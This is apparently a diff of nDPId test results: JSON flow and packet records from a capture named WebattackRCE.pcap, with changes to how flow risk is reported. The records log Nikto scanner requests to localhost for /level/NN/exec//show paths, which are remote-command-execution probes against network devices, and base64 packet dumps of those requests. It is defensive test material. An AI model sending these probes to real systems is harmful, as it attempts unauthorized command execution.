+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}}
